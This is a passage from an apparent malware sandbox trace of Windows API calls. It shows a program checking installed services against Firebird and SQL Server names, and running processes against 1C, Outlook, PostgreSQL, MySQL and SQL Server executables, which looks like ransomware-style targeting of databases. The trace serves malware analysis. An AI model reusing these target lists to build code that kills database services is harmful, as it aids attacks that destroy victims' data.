lpString2="AudioEndpointBuilder") returned 1 [0031.704] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0031.704] lstrlenW (lpString="AudioSrv") returned 8 [0031.704] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0031.704] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0031.704] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0031.704] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0031.704] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0031.704] lstrlenW (lpString="BFE") returned 3 [0031.704] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0031.704] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0031.704] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0031.704] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0031.704] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0031.704] lstrlenW (lpString="CryptSvc") returned 8 [0031.704] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0031.704] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0031.704] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0031.704] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0031.704] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0031.704] lstrlenW (lpString="CscService") returned 10 [0031.705] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0031.705] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0031.705] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0031.705] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0031.705] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0031.705] lstrlenW (lpString="DcomLaunch") returned 10 [0031.705] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0031.705] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0031.705] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0031.705] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0031.705] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0031.705] lstrlenW (lpString="Dhcp") returned 4 [0031.705] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0031.705] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0031.705] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0031.705] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0031.705] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0031.705] lstrlenW (lpString="Dnscache") returned 8 [0031.705] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0031.705] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0031.705] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0031.705] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0031.705] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0031.705] lstrlenW (lpString="DPS") returned 3 [0031.705] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0031.705] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0031.705] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0031.705] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0031.705] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0031.705] lstrlenW (lpString="eventlog") returned 8 [0031.705] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0031.705] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0031.705] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0031.705] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0031.706] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0031.706] lstrlenW (lpString="EventSystem") returned 11 [0031.706] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0031.706] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0031.706] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0031.706] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0031.706] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0031.706] lstrlenW (lpString="gpsvc") returned 5 [0031.706] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0031.706] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0031.706] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0031.706] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0031.706] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0031.706] lstrlenW (lpString="iphlpsvc") returned 8 [0031.706] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0031.706] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0031.706] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0031.706] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0031.706] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0031.706] lstrlenW (lpString="LanmanServer") returned 12 [0031.706] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0031.706] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0031.706] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0031.706] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0031.706] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0031.706] lstrlenW (lpString="LanmanWorkstation") returned 17 [0031.706] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0031.706] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0031.706] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0031.706] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0031.706] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0031.706] lstrlenW (lpString="lmhosts") returned 7 [0031.706] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0031.706] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0031.706] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0031.706] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0031.707] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0031.707] lstrlenW (lpString="MMCSS") returned 5 [0031.707] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0031.707] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0031.707] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0031.707] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0031.707] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0031.707] lstrlenW (lpString="MpsSvc") returned 6 [0031.707] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0031.707] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0031.707] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0031.707] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0031.707] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0031.707] lstrlenW (lpString="Netman") returned 6 [0031.707] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0031.707] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0031.707] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0031.707] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0031.707] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0031.707] lstrlenW (lpString="netprofm") returned 8 [0031.707] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0031.707] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0031.707] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0031.707] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0031.707] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0031.707] lstrlenW (lpString="NlaSvc") returned 6 [0031.708] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0031.708] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0031.708] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0031.708] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0031.708] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0031.708] lstrlenW (lpString="nsi") returned 3 [0031.708] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0031.708] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0031.708] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0031.708] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0031.708] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0031.708] lstrlenW (lpString="PcaSvc") returned 6 [0031.708] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0031.708] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0031.708] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0031.708] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0031.708] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0031.708] lstrlenW (lpString="PlugPlay") returned 8 [0031.708] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0031.708] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0031.708] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0031.708] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0031.708] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0031.708] lstrlenW (lpString="Power") returned 5 [0031.708] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0031.708] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0031.708] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0031.708] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0031.708] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0031.708] lstrlenW (lpString="ProfSvc") returned 7 [0031.708] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0031.708] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0031.708] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0031.708] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0031.708] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0031.709] lstrlenW (lpString="RpcEptMapper") returned 12 [0031.709] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0031.709] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0031.709] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0031.709] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0031.709] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0031.709] lstrlenW (lpString="RpcSs") returned 5 [0031.709] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0031.709] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0031.709] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0031.709] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0031.709] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0031.709] lstrlenW (lpString="SamSs") returned 5 [0031.709] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0031.709] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0031.709] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0031.709] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0031.709] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0031.709] lstrlenW (lpString="Schedule") returned 8 [0031.709] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0031.709] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0031.709] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0031.709] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0031.709] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0031.709] lstrlenW (lpString="SENS") returned 4 [0031.709] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0031.709] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0031.709] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0031.709] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0031.709] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0031.709] lstrlenW (lpString="ShellHWDetection") returned 16 [0031.709] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0031.709] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0031.709] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0031.710] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0031.710] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0031.710] lstrlenW (lpString="Spooler") returned 7 [0031.710] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0031.710] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0031.710] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0031.710] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0031.710] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0031.710] lstrlenW (lpString="SysMain") returned 7 [0031.710] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0031.710] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0031.710] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0031.710] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0031.710] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0031.710] lstrlenW (lpString="Themes") returned 6 [0031.710] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0031.710] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0031.710] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0031.710] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0031.710] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0031.710] lstrlenW (lpString="TrkWks") returned 6 [0031.710] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0031.710] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0031.710] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0031.710] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0031.710] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0031.710] lstrlenW (lpString="UxSms") returned 5 [0031.710] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0031.710] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0031.710] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0031.710] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0031.710] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0031.710] lstrlenW (lpString="WdiServiceHost") returned 14 [0031.710] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0031.710] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0031.710] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0031.711] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0031.711] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0031.711] lstrlenW (lpString="WdiSystemHost") returned 13 [0031.711] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0031.711] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0031.711] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0031.711] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0031.711] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0031.711] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0031.711] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0031.711] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0031.711] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0031.711] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0031.711] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0031.711] lstrlenW (lpString="Winmgmt") returned 7 [0031.711] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0031.711] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0031.711] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0031.711] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0031.711] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0031.711] lstrlenW (lpString="WPDBusEnum") returned 10 [0031.711] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0031.711] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0031.711] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0031.711] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0031.711] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0031.711] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5de498 | out: hHeap=0x570000) returned 1 [0031.711] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x118 [0031.714] Process32FirstW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0031.714] Process32NextW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0031.715] lstrlenW (lpString="System") returned 6 [0031.715] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0031.715] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0031.715] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0031.715] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0031.715] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0031.715] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0031.715] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0031.715] Process32NextW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0031.716] lstrlenW (lpString="smss.exe") returned 8 [0031.716] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0031.716] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0031.716] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0031.716] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0031.716] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0031.716] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0031.716] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0031.716] Process32NextW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0031.716] lstrlenW (lpString="csrss.exe") returned 9 [0031.716] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0031.716] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0031.716] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0031.716] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0031.716] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0031.716] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0031.717] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0031.717] Process32NextW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0031.717] lstrlenW (lpString="wininit.exe") returned 11 [0031.717] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0031.717] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0031.717] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0031.717] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0031.717] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0031.717] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0031.717] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0031.717] Process32NextW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0031.718] lstrlenW (lpString="csrss.exe") returned 9 [0031.718] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0031.718] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0031.718] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0031.718] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0031.718] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0031.718] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0031.718] Process32NextW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0031.719] lstrlenW (lpString="winlogon.exe") returned 12 [0031.719] Process32NextW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0031.719] lstrlenW (lpString="services.exe") returned 12 [0031.719] Process32NextW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0031.720] lstrlenW (lpString="lsass.exe") returned 9 [0031.720] Process32NextW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0031.720] lstrlenW (lpString="lsm.exe") returned 7 [0031.720] Process32NextW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0031.721] lstrlenW (lpString="svchost.exe") returned 11 [0031.721] Process32NextW (in: hSnapshot=0x118, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0031.722] 